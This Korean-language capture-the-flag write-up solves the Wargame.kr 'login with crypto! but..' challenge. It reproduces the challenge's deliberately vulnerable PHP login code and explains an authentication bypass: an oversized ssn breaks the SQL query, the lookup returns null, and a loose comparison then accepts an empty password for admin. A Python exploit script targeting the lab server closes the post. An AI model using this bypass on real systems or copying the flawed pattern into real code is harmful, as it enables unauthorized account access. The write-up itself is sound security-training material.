Wargame.kr [login with crypto! but..] 풀이

login with crypto! but..

 

 

sucker_enc is sucks.

Can you login?

 

 

 

 

 

<?php
 
if (isset($_GET['view-source'])) {
    show_source(__FILE__);
    exit();
}
 
include("../lib.php"); // include for auth_code function.
/*******************************************************
- DB SCHEMA (initilizing)
 
create table accounts(
 idx int auto_increment primary key,
 user_id varchar(32) not null unique,
 user_ps varchar(64) not null,
 encrypt_ss text not null
);
 
********************************************************/
 
function db_conn(){
 mysql_connect("localhost","login_with_cryp","login_with_crypto_but_pz");
 mysql_select_db("login_with_crypto_but");
}
 
function init(){
 db_conn();
 $password = crypt(rand().sha1(file_get_contents("/var/lib/dummy_file").rand())).rand();
 mysql_query("insert into accounts values (null,'admin','{$password}','".sucker_enc('881114')."')"); // admin`s password is secret! xD
 mysql_query("insert into accounts values (null,'guest','guest','".sucker_enc('000000')."')");
}
//init(); // create user for initializing
 
function enc($str){
 $s_key = "L0V3LySH:butsheismyxgf..";
 $s_vector_iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_3DES, MCRYPT_MODE_ECB), MCRYPT_RAND);
 $en_str = mcrypt_encrypt(MCRYPT_3DES, $s_key, $str, MCRYPT_MODE_ECB, $s_vector_iv);
 $en_base64 = base64_encode($en_str);
 $en_hex = bin2hex($en_str);
 return $en_hex;
}
 
function sucker_enc($str){
 for($i=0;$i<8;$i++) $str = enc($str);
 return $str;
}
 
function get_password($user,$ssn){
 db_conn();
 $user = mysql_real_escape_string($user);
 $ssn  = mysql_real_escape_string($ssn);
 $result = mysql_query("select user_ps from accounts where user_id='{$user}' and encrypt_ss='".sucker_enc($ssn)."'");
 $row = mysql_fetch_array($result);
 if ($row === false) {
  die("there is not valid account!");
 }
 return $row[0]; 
}
 
ini_set("display_errors", true);
 
if( (isset($_POST['user']) && isset($_POST['ssn']) && isset($_POST['pass'])) ){
 
 sleep(2); // do not bruteforce !!!! this challenge is not for bruteforce!!
 
 if($_POST['pass'] == get_password($_POST['user'],$_POST['ssn'])){
 
  if($_POST['user'] == "admin"){
   echo "Login Success!!! PASSWORD IS : <b>".auth_code("login with crypto! but..")."</b>";
  }else{
   echo "Login Success. but you r not 'admin'..";
  }
 }else{
  echo "Login Failed";
 }
 
}
 
?>
<hr />
<form method="post" action="./index.php">
<table>
 <tr><td>Identify</td><td><input type='text' value='guest' maxlength='32' name='user' /></td>
 <tr><td>Social Security</td><td><input type='text' maxlength='6' value='000000' name='ssn' /></td>
 <tr><td>PASSWORD</td><td><input type='text' value='guest' name='pass' /></td>
 <tr><td colspan="2"><input type="submit" value="Login" /></td></tr>
</table>
</form>
<hr />
<a href='./?view-source'>GET SOURCE</a>

 

 

php overflow를 이용하는 문제다.

 

 

 

 

 

 

52행 쿼리문에서 sucker_enc($ssn) 값이 매우 길어져서 쿼리문이 매우 길어지면 쿼리 실행에서 overflow가 나서

mysql_query함수가 false를 반환하게 된다.

 

그럼 mysql_fetch_array(Flase)는 null 값을 반환한다.

 

 

 

 

 

 

 

 

66행에서 get_password(...)의 값이 null이 되고, pass값에 아무입력을 하지 않으면

 

"" == null이 참이되어 admin으로 로그인이 가능하다.

 

 

 

 

 

 

 

 

ssn에 값을 너무 크게 주면 php가 터져버린다.

 

Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 56391681 bytes) in /var/www/html/login_with_crypto_but/index.php on line 39

 

이 오류메세지를 참고해서 ssn의 값의 크기를 조절하면 된다.

 

 

 

 

 

import urllib
import urllib2
 
def chk(payload):
    url = "http://wargame.kr:8080/login_with_crypto_but/index.php"
 
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    data = {"user": "admin", "pass": "", "ssn": payload}
    data = urllib.urlencode(data)
    request = urllib2.Request(url, data)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    data = opener.open(request)
    data = data.read()
 
    #print(payload)
    print data
    return data
 
payload = "A"*81114
chk(payload)